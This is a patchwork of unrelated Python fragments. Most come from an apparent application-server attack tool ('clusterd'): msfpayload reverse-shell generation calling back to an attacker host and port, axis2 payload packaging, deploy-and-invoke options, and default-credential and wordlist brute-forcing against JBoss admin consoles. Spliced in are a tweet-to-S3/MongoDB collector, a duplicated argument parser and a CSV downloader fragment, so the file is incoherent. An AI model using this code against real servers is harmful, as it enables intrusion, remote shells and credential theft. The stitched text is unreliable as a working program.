resp = getoutput("msfpayload %s LHOST=%s LPORT=%s SHELL=%s %s" %
(PAYLOAD, lhost, lport, SHELL, out))
'''For axis2 payloads, we have to add a few things to the msfpayload output'''
if (options.remote_service in ["axis2"]):
services_xml = """<service name="shell" scope="application">
<description>
Clusterd axis2 service
</description>
<messageReceivers>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</messageReceivers>
<parameter name="ServiceClass">
metasploit.PayloadServlet
</parameter>
</service>"""
with ZipFile('shell.jar', 'a') as shellZip:
shellZip.write("./src/lib/axis2/PayloadServlet.class",
"metasploit/PayloadServlet.class")
shellZip.writestr("META-INF/services.xml", services_xml)
if len(resp) <= 1 or 'Created by' in resp:
utility.Msg("Payload generated (%s). Payload: %s" %
(out.split(' ')[2], PAYLOAD))
# also log some auxiliary information
getoutput("echo Generated at %s > ./src/lib/shell.log" %
utility.timestamp())
getoutput("echo %s:%s >> ./src/lib/shell.log" % (lhost, lport))
getoutput("echo %s >> ./src/lib/shell.log" % (PAYLOAD))
else:
utility.Msg("Error generating payload: %s" % resp, LOG.ERROR)
def parse(arguments):
""" Parse command line options
"""
parser = ArgumentParser(usage='./clusterd.py [options]')
#
# Connection related command line arguments
#
connection = parser.add_argument_group(
"Connection", description='Options for configuring the connection')
connection.add_argument("-i",
help='Server address',
action='store',
dest='ip',
metavar='[ip address]')
connection.add_argument("-iL",
help='Server list',
action='store',
dest='input_list',
metavar='[file]')
connection.add_argument('-p',
help='Server port',
action='store',
dest='port',
type=int,
metavar='[port]')
connection.add_argument('--proxy',
help='Connect through proxy [http|https]',
action='store',
dest='proxy',
metavar="[proxy://server:port]")
connection.add_argument('--proxy-auth',
help='Proxy credentials',
action='store',
dest='proxy_auth',
metavar='[username:password]')
connection.add_argument('--timeout',
help='Connection timeout [%ds]' % state.timeout,
action='store',
dest='timeout',
default=state.timeout,
metavar='[seconds]')
connection.add_argument("--random-agent", help='Use a random User-Agent for'\
' requests', action='store_true', dest='random_agent',
default=False)
connection.add_argument("--ssl",
help='Force SSL',
action='store_true',
dest='ssl',
default=False)
#
# Remote host command line arguments
#
remote = parser.add_argument_group(
'Remote Host', description='Settings specific to the remote host')
remote.add_argument('-a',
help='Hint at remote host service',
action='store',
dest='remote_service',
metavar='[%s]' % ('|'.join(state.supported_platforms)))
remote.add_argument('-o',
help='Hint at remote host OS',
action='store',
dest='remote_os',
metavar='[windows|linux]',
default='windows')
remote.add_argument('-v',
help='Specific version to test',
action='store',
dest='version',
metavar='[version]',
default=None)
remote.add_argument('--usr-auth',
help='Login credentials for service',
action='store',
dest='usr_auth',
metavar='[username:password]')
remote.add_argument('--fingerprint',
help='Fingerprint the remote system',
action='store_true',
dest='fp',
default=False)
remote.add_argument("--arch",
help='Specify remote OS architecture',
action='store',
dest='arch',
default='x86',
metavar='[x86|x64]')
remote.add_argument("--delay",
help='Delay N seconds between each attempt',
action='store',
dest='delay',
default=None,
metavar='[seconds]')
#
# deploy options
#
deploy = parser.add_argument_group(
"Deploy", description='Deployment flags and settings')
deploy.add_argument("--deploy",
help='Deploy to the discovered service',
action='store',
dest='deploy',
metavar='[file]')
deploy.add_argument("--undeploy",
help='Undeploy file from server',
action='store',
dest='undeploy',
metavar='[context]')
deploy.add_argument("--deployer",
help="Specify a deployer to use",
action='store',
dest='deployer',
default=None,
metavar='[deployer]')
deploy.add_argument("--invoke",
help="Invoke payload after deployment",
action='store_true',
dest='invoke_payload',
default=False)
deploy.add_argument("--rand-payload",
help='Use a random name for the deployed file',
action='store_true',
dest='rand_payload',
default=None)
deploy.add_argument("-b",
help="Brute force credentials for user [admin]",
action='store',
dest='bf_user',
metavar='[user]',
default='admin')
deploy.add_argument('--wordlist',
help='Wordlist for brute forcing passwords',
action='store',
dest='wordlist',
default=None,
metavar='[path]')
#
# iterate over our supported platforms and build their
# auxiliary modules
#
for platform in state.supported_platforms:
group = parser.add_argument_group(platform + " modules")
group = build_platform_flags(platform, group)
other = parser.add_argument_group("Other",
description='Miscellaneous flags')
other.add_argument("--deployer-list",
help="List all available deployers",
action='store',
dest='deploy_list',
const='All',
nargs='?',
metavar='platform')
other.add_argument("--aux-list",
help="List all available exploits",
action='store',
dest='aux_list',
const='All',
nargs='?',
metavar='platform')
other.add_argument("--gen-payload",
help='Generate a reverse shell payload',
action='store',
dest='generate_payload',
metavar='[host:port] for reverse connection')
other.add_argument(
"--discover",
help=
"Attempt to discover application servers using the specified nmap gnmap output (use -sV when scanning)",
action="store",
dest='discovery_file',
metavar='[discovery_file]')
other.add_argument("--listen",
help='Adapter to listen on when needed',
action='store',
dest='listener',
metavar='[adapter]',
default=None)
other.add_argument("-d",
help='Enable debug output',
action='store_true',
dest='debug',
default=False)
other.add_argument("-l",
help='Log output to file [$time$_log.log]',
dest='flog',
action='store_true',
default=False)
# parse cli options
options = parser.parse_args(arguments)
if len(sys.argv) <= 1:
parser.print_help()
sys.exit(1)
#
# Setup state variables from given flags
#
if options.proxy:
state.proxy = options.proxy
if options.proxy_auth:
state.proxy_auth = options.proxy_auth
if options.debug:
state.isdebug = True
if options.usr_auth:
state.usr_auth = options.usr_auth
if options.wordlist:
state.bf_wordlist = options.wordlist
if options.random_agent:
# select a random user-agent from the list
state.random_agent = choice(list(
open('./src/lib/user-agents.txt'))).rstrip()
utility.Msg("Random user agent '%s' selected" % (state.random_agent),
LOG.DEBUG)
if options.listener:
state.listener = options.listener
state.ssl = options.ssl
state.bf_user = options.bf_user
state.flog = ("%s_log.log" % utility.timestamp().replace(' ', '_')
if options.flog else None)
try:
state.timeout = float(options.timeout)
except:
utility.Msg(
"Timeout value must be an integer. Defaulting to %d." %
state.timeout, LOG.ERROR)
return options
def checkAuth(ip, port, title, version):
"""
"""
if version in ["5.1", "6.0", "6.1"] and title is JINTERFACES.WM:
for (usr, pswd) in default_credentials:
url = "http://%s:%s/admin-console/login.seam" % (ip, port)
data = OrderedDict([
("login_form", "login_form"),
("login_form:name", usr),
("login_form:password", pswd),
("login_form:submit", "Login"),
("javax.faces.ViewState", utility.fetch_viewState(url)),
])
response = utility.requests_post(url, data=data)
if response.status_code == 200:
utility.Msg("Successfully authenticated with %s:%s" % (usr, pswd), LOG.DEBUG)
if version in ["5.1"]:
return (dict_from_cookiejar(response.history[0].cookies), None)
return (dict_from_cookiejar(response.cookies), None)
else:
if title is JINTERFACES.JMX:
url = "http://%s:%s/jmx-console/" % (ip, port)
elif title is JINTERFACES.MM:
url = "http://%s:%s/management" % (ip, port)
elif title is JINTERFACES.WC:
url = "http://%s:%s/web-console" % (ip, port)
else:
utility.Msg("Unsupported auth interface: %s" % title, LOG.DEBUG)
return
# check with given auth
if state.usr_auth:
(usr, pswd) = state.usr_auth.split(':')
return _auth(usr, pswd, url, version)
# else try default credentials
for (usr, pswd) in default_credentials:
cook = _auth(usr, pswd, url, version)
if cook:
return cook
# if we're still here, check if they supplied a wordlist
if state.bf_wordlist and not state.hasbf:
state.hasbf = True
wordlist = []
with open(state.bf_wordlist, 'r') as f:
# ensure everything is ascii or requests will explode
wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]
utility.Msg("Brute forcing %s account with %d passwords..." %
(state.bf_user, len(wordlist)), LOG.DEBUG)
try:
for (idx, word) in enumerate(wordlist):
stdout.flush()
stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m" \
% (utility.timestamp(), state.bf_user,
idx+1, len(wordlist)))
cook = _auth(state.bf_user, word, url, version)
if cook:
print '' # newline
# lets insert these credentials to the default list so we
# don't need to bruteforce it each time
if not (state.bf_user, word) in default_credentials:
default_credentials.insert(0, (state.bf_user, word))
utility.Msg("Successful login %s:%s" %
(state.bf_user, word), LOG.SUCCESS)
return cook
print ''
except KeyboardInterrupt:
pass
from datetime import datetime
import json
from os import rename
import lib
from s3 import create_boto_client, process_local_file_to_S3
from twitter_funcs import collect_tweets, create_tweet_iterator
from mongo import create_mongo_client_to_database_collection, insert_to_mongo
from utility import get_credentials, timestamp, write_to_disk
from requests import HTTPError
if __name__ == "__main__":
credentials = get_credentials()
if credentials['twitter']['token'] is None:
print(
"Did you forget to add your twitter tokens to the credentials.json file?"
)
raise HTTPError
tweet_iterator = create_tweet_iterator()
s3_client = create_boto_client()
collection_client = create_mongo_client_to_database_collection()
while True:
timestamp()
tweets = collect_tweets(tweet_iterator, 100)
filename = write_to_disk(tweets)
process_local_file_to_S3(s3_client, filename)
insert_to_mongo(s3_client, collection_client, filename)
def parse(arguments):
""" Parse command line options
"""
parser = ArgumentParser(usage='./clusterd.py [options]')
#
# Connection related command line arguments
#
connection = parser.add_argument_group("Connection",
description = 'Options for configuring the connection')
connection.add_argument("-i", help='Server address', action='store',
dest='ip', metavar='[ip address]')
connection.add_argument("-iL", help='Server list', action='store',
dest='input_list', metavar='[file]')
connection.add_argument('-p', help='Server port', action='store',
dest='port', type=int, metavar='[port]')
connection.add_argument('--proxy', help='Connect through proxy [http|https]',
action='store', dest='proxy',
metavar="[proxy://server:port]")
connection.add_argument('--proxy-auth', help='Proxy credentials',
action='store', dest='proxy_auth',
metavar='[username:password]')
connection.add_argument('--timeout', help='Connection timeout [%ds]' % state.timeout,
action='store', dest='timeout',
default=state.timeout, metavar='[seconds]')
connection.add_argument("--random-agent", help='Use a random User-Agent for'\
' requests', action='store_true', dest='random_agent',
default=False)
connection.add_argument("--ssl", help='Force SSL', action='store_true',
dest='ssl', default=False)
#
# Remote host command line arguments
#
remote = parser.add_argument_group('Remote Host',
description = 'Settings specific to the remote host')
remote.add_argument('-a', help='Hint at remote host service',
action='store', dest='remote_service',
metavar='[%s]' % ('|'.join(state.supported_platforms)))
remote.add_argument('-o', help='Hint at remote host OS',
action='store', dest='remote_os',
metavar='[windows|linux]', default='windows')
remote.add_argument('-v', help='Specific version to test', action='store',
dest='version', metavar='[version]', default=None)
remote.add_argument('--usr-auth', help='Login credentials for service',
action='store', dest='usr_auth',
metavar='[username:password]')
remote.add_argument('--fingerprint', help='Fingerprint the remote system',
action='store_true', dest='fp', default=False)
remote.add_argument("--arch", help='Specify remote OS architecture',
action='store', dest='arch', default='x86',
metavar='[x86|x64]')
#
# deploy options
#
deploy = parser.add_argument_group("Deploy",
description = 'Deployment flags and settings')
deploy.add_argument("--deploy", help='Deploy to the discovered service',
action='store', dest='deploy', metavar='[file]')
deploy.add_argument("--undeploy", help='Undeploy file from server',
action='store', dest='undeploy', metavar='[context]')
deploy.add_argument("--deployer", help="Specify a deployer to use",
action='store', dest='deployer', default=None,
metavar='[deployer]')
deploy.add_argument("--invoke", help="Invoke payload after deployment",
action='store_true', dest='invoke_payload', default=False)
deploy.add_argument("--rand-payload", help='Use a random name for the deployed file',
action='store_true', dest='rand_payload', default=None)
deploy.add_argument("-b", help="Brute force credentials for user [admin]", action='store',
dest='bf_user', metavar='[user]', default='admin')
deploy.add_argument('--wordlist', help='Wordlist for brute forcing passwords',
action='store', dest='wordlist', default=None,
metavar='[path]')
#
# iterate over our supported platforms and build their
# auxiliary modules
#
for platform in state.supported_platforms:
group = parser.add_argument_group(platform + " modules")
group = build_platform_flags(platform, group)
other = parser.add_argument_group("Other",
description='Miscellaneous flags')
other.add_argument("--deployer-list", help="List all available deployers",
action='store_true', dest='deploy_list', default=False)
other.add_argument("--aux-list", help="List all available exploits",
action='store_true', dest='aux_list', default=False)
other.add_argument("--gen-payload", help='Generate a reverse shell payload',
action='store', dest='generate_payload',
metavar='[host:port] for reverse connection')
other.add_argument("--discover",help="Attempt to discover application servers using the specified nmap gnmap output (use -sV when scanning)",
action="store",dest='discovery_file',metavar='[discovery_file]')
other.add_argument("--listen", help='Adapter to listen on when needed',
action='store', dest='listener', metavar='[adapter]',
default=None)
other.add_argument("-d", help='Enable debug output', action='store_true',
dest='debug', default=False)
other.add_argument("-l", help='Log output to file [$time$_log.log]',
dest='flog', action='store_true', default=False)
# parse cli options
options = parser.parse_args(arguments)
if len(sys.argv) <= 1:
parser.print_help()
sys.exit(1)
#
# Setup state variables from given flags
#
if options.proxy:
state.proxy = options.proxy
if options.proxy_auth:
state.proxy_auth = options.proxy_auth
if options.debug:
state.isdebug = True
if options.usr_auth:
state.usr_auth = options.usr_auth
if options.wordlist:
state.bf_wordlist = options.wordlist
if options.random_agent:
# select a random user-agent from the list
state.random_agent = choice(list(open('./src/lib/user-agents.txt'))).rstrip()
utility.Msg("Random user agent '%s' selected" % (state.random_agent), LOG.DEBUG)
if options.listener:
state.listener = options.listener
state.ssl = options.ssl
state.bf_user = options.bf_user
state.flog = ("%s_log.log" % utility.timestamp().replace(' ', '_') if options.flog else None)
try:
state.timeout = float(options.timeout)
except:
utility.Msg("Timeout value must be an integer. Defaulting to %d."
% state.timeout, LOG.ERROR)
return options
writer = csv.DictWriter(f, headers)
if not exist:
writer.writeheader()
writer.writerow(
dict(mid=dn['mid'],
aid=dn['aid'],
cid=dn['cid'],
title=dn['title'],
url=dn['url']))
print('failed topic saved in {}'.format(fn))
except Exception as e:
logger.error('error : failed to save topics. {}'.format(e))
if __name__ == '__main__':
runid = utility.timestamp()
md, kw, params = parse_command_line()
if md is None:
exit(-1)
if md == 'h':
if os.path.isfile('help.txt'):
if 'Darwin' in platform.system():
os.system('cat help.txt')
if 'Windows' in platform.system():
os.system('type help.txt')
exit(0)
all_topics, all_files, all_downloads = [], [], []
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = subprocess.STARTF_USESHOWWINDOW
